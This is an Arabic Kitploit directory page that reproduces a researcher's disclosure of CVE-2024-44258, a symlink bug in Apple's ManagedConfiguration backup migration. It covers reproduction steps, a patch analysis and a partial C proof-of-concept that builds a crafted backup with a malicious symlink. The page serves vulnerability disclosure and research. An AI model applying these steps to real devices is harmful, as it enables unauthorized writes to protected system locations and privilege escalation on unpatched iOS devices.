Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-44258 — CVE-2024-44258 | Kitploit
أدوات/GitHubGitHub/ifpdz/cve-2024-44258
تصعيد الامتيازاتأمان iOSتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالأمن الجوال
GitHubifpdz/cve-2024-44258

CVE-2024-44258

CVE-2024-44258

عرض المستودع
891449منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-44258: ثغرة الرابط الرمزي في ManagedConfiguration Framework

الملخص

تسلط CVE-2024-44258 الضوء على ثغرة رابط رمزي (symlink) داخل ManagedConfiguration framework وprofiled daemon في أجهزة Apple. عند استعادة نسخة احتياطية مُصمَّمة، تفشل عملية الترحيل في التحقق مما إذا كان مجلد الوجهة رابطًا رمزيًا، مما يؤدي إلى ترحيل غير مصرح به للملفات إلى مناطق مقيدة.


معرّف CVE

تم تعيين CVE-2024-44258 لهذه المشكلة. تُعد معرّفات CVE معرّفات فريدة للثغرات الأمنية المُعلنة علنًا.

  • الأثر: قد تؤدي استعادة ملف نسخة احتياطية مُصمَّم بشكل خبيث إلى تعديل ملفات النظام المحمية.
  • الوصف: تمت معالجة هذه المشكلة من خلال تحسين التعامل مع الروابط الرمزية في المكونات المتأثرة.

لمزيد من المعلومات، يرجى الرجوع إلى صفحات الدعم الرسمية من Apple:

  • support.apple.com/en-us/121569
  • support.apple.com/en-us/121566
  • support.apple.com/en-us/121563

التفاصيل

المكونات المتأثرة:

  • ManagedConfiguration framework
  • profiled daemon

الأثر:

تتيح الثغرة للمهاجمين استغلال الروابط الرمزية أثناء استعادة نسخة احتياطية لتجاوز قيود المجلدات، وكتابة ملفات في مناطق معزولة (sandboxed) أو محمية. قد تسمح هذه الثغرة بالوصول غير المصرح به إلى البيانات، أو تصعيد الامتيازات، أو استغلال خدمات أخرى تعتمد على الإعدادات المعدّلة.


خطوات إعادة الإنتاج

  1. إنشاء نسخة احتياطية مُصمَّمة

    • أنشئ رابطًا رمزيًا من:
      /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/
      إلى مجلد معزول باستخدام النطاق:
      root@kitploit:~
      SysSharedContainerDomain-systemgroup.com.apple.configurationprofiles
      
  2. إضافة الملفات المطلوبة

    • أدخل الملفات والمجلدات في:
      /private/var/mobile/Library/ConfigurationProfiles
      باستخدام HomeDomain.
  3. استعادة النسخة الاحتياطية المُصمَّمة

    • استعد النسخة الاحتياطية على أي جهاز iPhone أو iPod أو iPad.
  4. إعادة تشغيل الجهاز

    • بعد إعادة التشغيل، افحص محتويات المنطقة المقيدة. ستجد الملفات/المجلدات قد رُحِّلت إلى موقع كان محميًا سابقًا.

النتائج المتوقعة مقابل النتائج الفعلية

  • المتوقع:
    يجب ترحيل /private/var/mobile/Library/ConfigurationProfiles إلى:
    /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/

  • الفعلي:
    بسبب الرابط الرمزي المُصمَّم، تُرحَّل الملفات إلى مجلد مقيد قد يحتوي على بيانات حساسة أو محمية.


حالة الاستغلال

لوحظ استغلال هذه الثغرة في البيئات الحقيقية (in the wild) لعدة أشهر، مما يشير إلى استغلالها النشط.


شرح التصحيح

في iOS 18.1 beta5، أصدرت Apple تصحيحًا لمعالجة ثغرة الرابط الرمزي داخل ManagedConfiguration framework. تمت إضافة الدالة _MCDestinationPathIsSafeFromSymlinkAttacks لإجراء فحص أمان على مسار الوجهة، مما يمنع الترحيل غير المصرح به للملفات إلى المناطق المقيدة. تمت إضافة هذا الفحص تحديدًا إلى الدالة MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:.


الدالة المتأثرة: -[MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:]

تم تنفيذ إصلاح الثغرة من خلال تعديل الدالة -[MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:]، المسؤولة عن التعامل مع ترحيل الملفات داخل ManagedConfiguration framework. إليك كيفية عمل التصحيح:

  • إضافة فحص الرابط الرمزي
    أضافت Apple استدعاءً لـ _MCDestinationPathIsSafeFromSymlinkAttacks في بداية MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:. تتحقق هذه الدالة الآن مما إذا كان مسار الوجهة خاليًا من الروابط الرمزية، مما يضيف طبقة حماية قبل تنفيذ أي عملية ترحيل.

  • فحص الشرط
    إذا اكتشفت _MCDestinationPathIsSafeFromSymlinkAttacks رابطًا رمزيًا في مسار الوجهة، فإنها تمنع الترحيل من المتابعة. تسجّل الدالة رسالة خطأ (fault) باستخدام OS_LOG_TYPE_FAULT وتخرج مبكرًا، مما يوقف عملية الملف.


مقارنة الكود

باستخدام Diaphora في IDA، تكشف مقارنة الفروقات بين iOS 18.1 beta4 وiOS 18.1 beta5 عن التغييرات في الدالة -[MCMigrator_copyAlmostAtomicallyItemAtPath:toPath:error:]. تُظهر الصورة أدناه الكود المعدَّل مع فحص الرابط الرمزي المضاف.

مقارنة التصحيح


إثبات المفهوم (PoC)

فيما يلي مقتطف كود نموذجي يوضح كيفية إنشاء نسخة احتياطية تستغل الثغرة. يوضح هذا الكود كيفية إضافة الرابط الرمزي والملفات إلى النسخة الاحتياطية، لمحاكاة العملية دون تقديم ملف النسخة الاحتياطية المُصمَّم الفعلي.

root@kitploit:~
unsigned char* plist_data = NULL;
        file_read("/path/to/your/test-outofsandbox.plist", &plist_data, &plist_size); // THIS NEED TO BE CHANGED TO THE FILE PATH

    backup_add_directory(backup, "HomeDomain", "Library/ConfigurationProfiles", 0755, 501, 501);
    backup_add_file_with_data(backup, "HomeDomain", "Library/ConfigurationProfiles/test.plist", 0755, 501, 501, 4, plist_data, plist_size); // WE ADD OUR FILES
         
    backup_add_directory(backup, "SysSharedContainerDomain-systemgroup.com.apple.configurationprofiles", NULL, 0755, 501, 501);
    backup_add_symlink(backup, "SysSharedContainerDomain-systemgroup.com.apple.configurationprofiles", "Library", "/private/var/mobile/Library", 501, 501); // CHANGE THE PATH TO THE SANDBOXED FOLDER YOU WANT TO WRITE IN YOUR FILES
    
    backup_write_mbdb(backup); // SAVE THE BACKUP
    backup_free(backup);

الجدول الزمني للإفصاح

  • التقرير الأولي إلى Apple: [06/07/2024]
  • تعيين CVE: CVE-2024-44258
  • الإفصاح العام: [02/11/2024]

شكر وتقدير

شكر خاص لفريق أمان Apple على استجابتهم السريعة وتعاونهم.

تم اكتشاف الثغرة بواسطة Hichem Maloufi وChristian Mina


الترخيص

هذا المستودع مرخّص بموجب رخصة MIT. راجع LICENSE لمزيد من المعلومات.

تنزيل الأداة